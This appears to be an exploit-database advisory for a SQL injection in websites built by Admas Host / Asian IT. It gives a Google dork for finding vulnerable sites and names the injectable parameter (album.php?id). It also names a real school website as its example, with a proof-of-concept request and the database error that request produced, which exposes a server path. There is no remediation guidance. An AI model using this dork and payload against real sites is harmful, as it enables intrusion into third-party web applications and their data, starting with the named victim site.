#################################################################################################
# Exploit Title : Powered by Admas Host & Developed by Asian IT SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/07/2018
# Vendor Homepage : admashost.com ~ asianitinc.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Description for the Software :
ASIAN IT INC. is a rising software development firm in Bangladesh and working in both of global and local market since 2016.
#################################################################################################
# Google Dork : intext:''Powered by Admas Host & Developed by Asian IT''
# Exploit : /album.php?id=[SQL Inj]
#################################################################################################
# Example Site => scscsrj.edu.bd/album.php?id=24%27 => [ Proof of Concept for SQL Inj ] => archive.is/ESzyK
# SQL Database Error =>
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/scscsrjedu/public_html/album.php on line 23
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################